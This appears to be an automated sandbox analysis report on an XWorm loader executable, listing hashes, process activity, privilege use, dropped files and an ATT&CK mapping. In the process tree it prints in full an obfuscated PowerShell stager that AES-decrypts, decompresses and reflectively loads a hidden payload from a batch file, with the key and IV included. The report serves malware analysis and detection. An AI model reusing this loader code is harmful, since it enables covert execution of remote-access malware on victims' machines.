61bad8d96f17bc5e303a42e6fb63aa90dacec97a90aa2bf7bfebdee5d7f969eb

General

Target

X-Worm-V5-main/XWorm V5.0/XWormLoader.exe
Size

8.6MB
MD5

2aff4d1edefd1017408f77bbf15ef6c2
SHA1

cfc1827c2e45802cbfe931ab66dea427c512a6ab
SHA256

7de8a4b7288fe71fdb8fa2eb453059937ce5ff998e117dc79c8d68de7e0f9315
SHA512

a456dba519592187461596f0ceb1e008e0a9a974a79698acda5bb1cfe000b99fd1bcafe140a022a40db6b447cb70e335dba137500a4f05e68299a3da758f9756
SSDEEP

196608:6HwveWmitDQXAWhg8tlFPreKofxWJHVP3u8CkXt0rQMJB4Eo:IkmitD85hgAtop81Hh0sUBk

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

Processes:

XWormLoader.exe

pid process

2380 XWormLoader.exe
Loads dropped DLL 5 IoCs

Processes:

WerFault.exe

pid process

2420 WerFault.exe
2420 WerFault.exe
2420 WerFault.exe
2420 WerFault.exe
2420 WerFault.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2420 2380 WerFault.exe XWormLoader.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2548 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2548 powershell.exe

pid	process
2380	XWormLoader.exe

pid	process
2420	WerFault.exe
2420	WerFault.exe
2420	WerFault.exe
2420	WerFault.exe
2420	WerFault.exe

pid	pid_target	process	target process
2420	2380	WerFault.exe	XWormLoader.exe

pid	process
2548	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2548	powershell.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

XWormLoader.exeXWormLoader.execmd.exe

description	pid	process	target process
PID 2964 wrote to memory of 2380	2964	XWormLoader.exe	XWormLoader.exe
PID 2964 wrote to memory of 2380	2964	XWormLoader.exe	XWormLoader.exe
PID 2964 wrote to memory of 2380	2964	XWormLoader.exe	XWormLoader.exe
PID 2964 wrote to memory of 2380	2964	XWormLoader.exe	XWormLoader.exe
PID 2964 wrote to memory of 2620	2964	XWormLoader.exe	cmd.exe
PID 2964 wrote to memory of 2620	2964	XWormLoader.exe	cmd.exe
PID 2964 wrote to memory of 2620	2964	XWormLoader.exe	cmd.exe
PID 2380 wrote to memory of 2420	2380	XWormLoader.exe	WerFault.exe
PID 2380 wrote to memory of 2420	2380	XWormLoader.exe	WerFault.exe
PID 2380 wrote to memory of 2420	2380	XWormLoader.exe	WerFault.exe
PID 2380 wrote to memory of 2420	2380	XWormLoader.exe	WerFault.exe
PID 2620 wrote to memory of 2980	2620	cmd.exe	cmd.exe
PID 2620 wrote to memory of 2980	2620	cmd.exe	cmd.exe
PID 2620 wrote to memory of 2980	2620	cmd.exe	cmd.exe
PID 2620 wrote to memory of 2548	2620	cmd.exe	powershell.exe
PID 2620 wrote to memory of 2548	2620	cmd.exe	powershell.exe
PID 2620 wrote to memory of 2548	2620	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\X-Worm-V5-main\XWorm V5.0\XWormLoader.exe
"C:\Users\Admin\AppData\Local\Temp\X-Worm-V5-main\XWorm V5.0\XWormLoader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2964

C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe
"C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2380 -s 568
3⤵
- Loads dropped DLL
- Program crash
PID:2420

C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\svchost.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function ZSHdk($KarSC){ $ZfCFn=[System.Security.Cryptography.Aes]::Create(); $ZfCFn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $ZfCFn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $ZfCFn.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('KtZKjEms98+Uz3JdAwXifcpceQe4mGFCZZetPfWLjV8='); $ZfCFn.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('XxhTpYt8KLdLDSpO7hDOxw=='); $tlguC=$ZfCFn.CreateDecryptor(); $return_var=$tlguC.TransformFinalBlock($KarSC, 0, $KarSC.Length); $tlguC.Dispose(); $ZfCFn.Dispose(); $return_var;}function CaoMW($KarSC){ $tLaFs=New-Object System.IO.MemoryStream(,$KarSC); $lDGtw=New-Object System.IO.MemoryStream; Invoke-Expression '$ixeoS #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$tLaFs,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $ixeoS.CopyTo($lDGtw); $ixeoS.Dispose(); $tLaFs.Dispose(); $lDGtw.Dispose(); $lDGtw.ToArray();}function akbWW($KarSC,$vyQOD){ $xXjIa = @( '$qtafy = [System.Reflection.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$KarSC);', '$FBuAc = $qtafy.EntryPoint;', '$FBuAc.Invoke($null, $vyQOD);' ); foreach ($eBUTc in $xXjIa) { Invoke-Expression $eBUTc };}$QCWfW=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\svchost.bat').Split([Environment]::NewLine);foreach ($hgEiC in $QCWfW) { if ($hgEiC.StartsWith('SEROXEN')) { $GFlqW=$hgEiC.Substring(7); break; }}$llOQb=CaoMW (ZSHdk ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($GFlqW)));akbWW $llOQb (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\svchost.bat')); "
3⤵
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe
Filesize
101KB

MD5
39d81ca537ceb52632fbb2e975c3ee2f

SHA1
0a3814bd3ccea28b144983daab277d72313524e4

SHA256
76c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7

SHA512
18f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.bat
Filesize
11.1MB

MD5
3938509631ea32a0fcf7a08699cb12bc

SHA1
7bafb88e071b9ba4e6c0503744963037f2246ce1

SHA256
318ccdeaff252e9b58be84ecae0b49ea76f2c35668ff6272837182fd80eb2060

SHA512
db69681592a4613df0442fb0c07d1565462f3973780a032e4a8a8ba9570a23c67029d3c715087dae0c6069582c53561d4a34bccde195f22b19e3368b89777550

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost.bat
Filesize
11.6MB

MD5
282a2f6622e0ae6e9626ce5c62080afc

SHA1
2a5472f80db7037baab0bef155be02b61cb99d46

SHA256
460a1bd0c0d0748654c5b73bfbd414a81d2bc2124b5b6f3fd07624c1e7405b1b

SHA512
c34f0dcb84a93f4438fa06f0bc81ad73f96c2cde3f7f8e0362b6d108a769aa53482238a2a82a5db15a55c79f92ef0d05e6e566516adba1eaf41d0ed3d8a64d29

Download Submit
memory/2380-38-0x0000000074980000-0x000000007506E000-memory.dmp

Filesize
6.9MB

Download
memory/2380-9-0x0000000000990000-0x00000000009AE000-memory.dmp

Filesize
120KB

Download
memory/2380-18-0x0000000074980000-0x000000007506E000-memory.dmp

Filesize
6.9MB

Download
memory/2548-32-0x0000000002D70000-0x0000000002DF0000-memory.dmp

Filesize
512KB

Download
memory/2548-37-0x0000000002D70000-0x0000000002DF0000-memory.dmp

Filesize
512KB

Download
memory/2548-41-0x0000000002D70000-0x0000000002DF0000-memory.dmp

Filesize
512KB

Download
memory/2548-31-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-40-0x0000000002D70000-0x0000000002DF0000-memory.dmp

Filesize
512KB

Download
memory/2548-33-0x00000000002F0000-0x00000000002F8000-memory.dmp

Filesize
32KB

Download
memory/2548-34-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Filesize
9.6MB

Download
memory/2548-30-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download
memory/2548-35-0x0000000002D70000-0x0000000002DF0000-memory.dmp

Filesize
512KB

Download
memory/2548-36-0x0000000002D70000-0x0000000002DF0000-memory.dmp

Filesize
512KB

Download
memory/2548-39-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

Filesize
9.6MB

Download
memory/2964-1-0x000007FEF5B40000-0x000007FEF652C000-memory.dmp

Filesize
9.9MB

Download
memory/2964-19-0x000007FEF5B40000-0x000007FEF652C000-memory.dmp

Filesize
9.9MB

Download
memory/2964-0-0x000000013F650000-0x000000013FEE6000-memory.dmp

Filesize
8.6MB

Download
memory/2964-2-0x000000001BA60000-0x000000001BAE0000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing